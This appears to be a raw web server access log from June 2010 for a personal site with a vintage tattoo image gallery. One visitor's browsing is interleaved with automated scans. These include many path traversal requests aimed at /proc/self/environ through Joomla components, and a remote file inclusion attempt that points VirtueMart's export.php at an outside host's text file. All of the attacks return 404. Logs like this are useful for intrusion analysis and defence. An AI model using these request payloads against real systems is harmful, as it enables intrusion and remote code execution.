78.41.233.128 - - [27/Jun/2010:09:40:01 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
178.63.9.134 - - [27/Jun/2010:09:40:32 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.121.21.189 - - [27/Jun/2010:09:40:33 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.247.176.194 - - [27/Jun/2010:09:40:35 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
201.116.197.150 - - [27/Jun/2010:09:40:43 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
201.116.197.150 - - [27/Jun/2010:09:40:43 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
201.116.197.150 - - [27/Jun/2010:09:40:43 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
24.162.136.251 - - [27/Jun/2010:09:41:00 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
76.10.155.128 - - [27/Jun/2010:09:41:05 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.ca/search?client=safari&rls=en&q=vintage+flash+tattoo&ie=UTF-8&oe=UTF-8&redir_esc=&ei=_mInTOGWIcilnQff-Jm9Bg""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:05 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:07 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
201.116.197.150 - - [27/Jun/2010:09:41:08 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.65"
76.10.155.128 - - [27/Jun/2010:09:41:13 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:13 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:13 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:13 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:13 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:13 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:13 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:13 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:13 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:14 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:14 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:21 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:21 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:21 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:21 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:21 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:21 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:21 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:21 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:21 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:22 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:22 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:28 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:28 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:28 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:28 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:28 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:28 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:28 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:28 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:28 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:29 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:29 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:34 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:34 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:34 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:34 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:34 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:35 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:35 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:35 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:35 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:35 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:35 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.162.136.251 - - [27/Jun/2010:09:41:38 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
24.162.136.251 - - [27/Jun/2010:09:41:38 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
24.162.136.251 - - [27/Jun/2010:09:41:39 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
76.10.155.128 - - [27/Jun/2010:09:41:39 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:40 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:40 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
76.10.155.128 - - [27/Jun/2010:09:41:40 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.162.136.251 - - [27/Jun/2010:09:41:46 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
213.165.85.241 - - [27/Jun/2010:09:41:50 -0500] "GET /logs/access_log.1274572800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:41:51 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:41:52 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.15.198.39 - - [27/Jun/2010:09:41:58 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
24.162.136.251 - - [27/Jun/2010:09:41:59 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
74.55.41.132 - - [27/Jun/2010:09:42:48 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:09:42:48 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:09:42:48 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:09:42:53 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
213.165.85.241 - - [27/Jun/2010:09:43:12 -0500] "GET /logs/access_log.1275004800//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.221.130.28 - - [27/Jun/2010:09:43:33 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:44:01 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
74.55.41.132 - - [27/Jun/2010:09:44:14 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:09:44:14 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:09:44:14 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.55.41.132 - - [27/Jun/2010:09:44:17 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
78.41.233.128 - - [27/Jun/2010:09:45:00 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:45:00 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:45:01 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:45:23 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
110.11.20.41 - - [27/Jun/2010:09:45:24 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
110.11.20.41 - - [27/Jun/2010:09:45:25 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
110.11.20.41 - - [27/Jun/2010:09:45:26 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.79"
24.162.136.251 - - [27/Jun/2010:09:46:14 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
